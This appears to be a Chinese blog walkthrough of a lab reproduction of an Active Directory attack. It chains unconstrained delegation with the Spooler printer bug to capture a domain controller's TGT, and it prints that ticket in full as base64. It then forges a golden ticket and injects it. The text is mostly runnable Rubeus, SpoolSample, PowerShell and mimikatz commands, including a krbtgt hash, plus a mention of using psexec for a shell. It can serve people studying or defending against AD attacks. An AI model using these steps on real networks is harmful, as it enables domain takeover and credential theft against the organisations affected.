環境
域: test.com
域控:Windows server 2012R2, 主機名: AD, IP: 192.168.1.7
域內主機:系統:windows 2008R2,主機名:WIN2008,ip:192.168.1.8
原理:利用非約束委派+Spooler打印機服務可以強制指定的主機進行連接
我們給win2008R2這個主機賬戶開啓非約束委派
復現
1、首先我們需要一個win2008R2的管理賬號
我直接用本地的管理員賬號打開一個cmd
直接運行命令
Rubeus.exe monitor /interval:1 /filteruser:AD$
# 我們可以用Rubeus來監聽Event ID爲4624事件,這樣可以第一時間截取到域控的TGT
# /interval:1 設置監聽間隔1秒
# /filteruser 監聽對象爲我們的域控,注意後面有個$,如果不設置監聽對象就監聽所有的TGT
2、隨便打開一個cmd(不需要管理員權限)
直接執行
SpoolSample_v4.5_x64.exe AD WIN2008
# 表示利用打印服務強制讓域控機向WIN2008主機驗證身份,這樣我們的Rubeus就可以監聽到TGS了
雖然報錯了,但是Rubeus已經接收到了TGT
這兒順便提一句,有時候cmd不能最大化
我們可以現在cmd運行wmic,然後再擴大cmd,再exit退出即可
3、提取TGS
我們先複製Rubeus監聽到的TGT的base64
doIEyDCCBMSgAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQobCFRFU1QuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhURVNULkNPTaOCA54wggOaoAMCARKhAwIBAqKCA4wEggOIizg+lVbsDAa52/eGBUXWJpRO41sYu+nax+InJiZwGIXDnAEu3GLvpPBTnlyUy5OFkwF0fxDtIJmz6d1ta5rcPla5UnFQtxqsLt2FAB8bI3oygtArPsLtVo2nk5cxzIWrpZiYbVv1af9GUvFTBUSYP8y/RgdhPXckAwbe8fJqBL+LwGnLzmA8E5x5AdBWQ58aYrr9UQgEoUxkSewA6Y76TmrBedZ5iTSUEKgeSfDH/kfrN9cxZEWKQVkZ9or69a/XYTUrekSXIZhFXqX1CjQmhUbXeUUptFzEnnpyYLFc0XLssxPMaKbsGvacTt1SZy7sLq5me6mB6JEP5nB68Is7o9luHTu0E3XAA2OGc3oZ3/lou32ddj3SFBYJkfgDjgM7du2/Ys3WyNKPPBRGBJExouhtVF2eM+E2ADbGBhMrN9QImq9cXHqKLW0qW0uQUcNlzzN10NEZq692ZFTomuPxWVLKeg+OuvJNsLS+D0kWYoCcTT7T48ZfEkZ6s9uBtb86ddEHzIasbLMuCGlYK/ISbF2C3Hxw5oEt6Bdj9rVdPTEr3XjMcmCemdiIGbd5jBqUabkd7UXkIq2J4mVuuApt0yy62Lb9dRv6YyyO2l8qr3Pr440zCAZMYXdmwWWuQiU2w1u0YMS14v4kjQcAnRUVSnEt7yw8LALcsFW8cOXbPuXF8KhzMZ1HA54crgieI8+n4aqZy6uMCtgQJHg8oH8K1QJdlxeWLpmROH3bUWGpbLIPWaV7d+6LLxePYioRhkTmWmigbqyTuIY5EbZWfqMH6/rjPacbdsnvYB82cr9RJ0zd6Hqu0z1266ZX0b1EIBTGADOS3zAC23nuduDwnW+3nWa5nJHG/wBKuXfhmidXp4Ccs7eQsWNYdZuDMknAsSzHG7b8Tq+CP+hA8b7/sUk2Rfl8dPqxlqDAPOauvqGzcpJUlHl69xS+IWpVnzag1Th10tLj+FkUJBmEHSV9eELKf38mlD8phQm+wZ4D0LCNVZpHUBSWPWw/vX0V4RVdIFTeRAlioj52IYFXMY+L427EN/fjefXLIJIXwgz+n4DumNYXlMzMOpMbURF/ZktM4+za5EQAmyaBBXvCavhkxg4UYWFpsAX5vgqOGvhbFWXxeBMh5HznA8+ORI0MNY1alJmfqUxuibD/POlHySGgxL1AehNoL7+bsxJW/5zq0iNEyaeJMHFeMnOj66OB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oCswKaADAgESoSIEIC9SDAhlYy3MFcTbkg/BdIKYbsoGO6JvgRk5ZDUFgHqcoQobCFRFU1QuQ09NohAwDqADAgEBoQcwBRsDQUQkowcDBQBgoQAApREYDzIwMjAwNjAyMTQwMzAyWqYRGA8yMDIwMDYwMzAwMDMwMlqnERgPMjAyMDA2MDkwNDMyMjJaqAobCFRFU1QuQ09NqR0wG6ADAgECoRQwEhsGa3JidGd0GwhURVNULkNPTQ==
然後直接用powershell轉到爲正常的TGT即可
[IO.File]::WriteAllBytes("絕對路徑\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))
有一個比較坑的,那就是第一個參數用絕對路徑,相對路徑不是pwd命令的路徑~~
這樣我們就可以得到TGT票據了
4、製作黃金票據
注入TGT票據前
不能提取所有用戶的hash
注入TGS票據後
然後就是製作黃金票據了
具體過程請參考另一篇文章
這兒請注意,我們這兒獲得的TGT票據,不能算黃金票據,因爲我們獲得的權限只是域控的本地管理權限,所以不能連接域控,但是我們確可以因此獲取所以用戶的hash,所以能製作真正的黃金票據~~
首先獲得域的SID
whoami /user
# S-1-5-21-3298638106-3321833000-1571791979
# 得到上面的SID,注意不需要後面表示賬號權限的幾位數
然後就是製作票據
kerberos::golden /domain:test.com /sid:S-1-5-21-3298638106-3321833000-1571791979 /krbtgt:0199f7c89b9d5262c897e0d1bf858bfb /user:administrator /ticket:ntlm.kirbi
然後注入票據
首先清除以前的票據
在cmd中運行 klist purge
在mimikatz運行:
kerberos::purge
kerberos::ptt ntlm.kirbi
然後klist查看我們注入的票據
可以直接連接域控
我們還可以直接用psexec反彈shell,因爲注入了黃金票據,所以不需要用戶名和祕密
這就是所有步驟了,如果有什麼不明白的歡迎留言~~
最後還有如何用ADfind查找非約束委派的計算機和用戶還沒寫,以後有機會再寫一下吧~~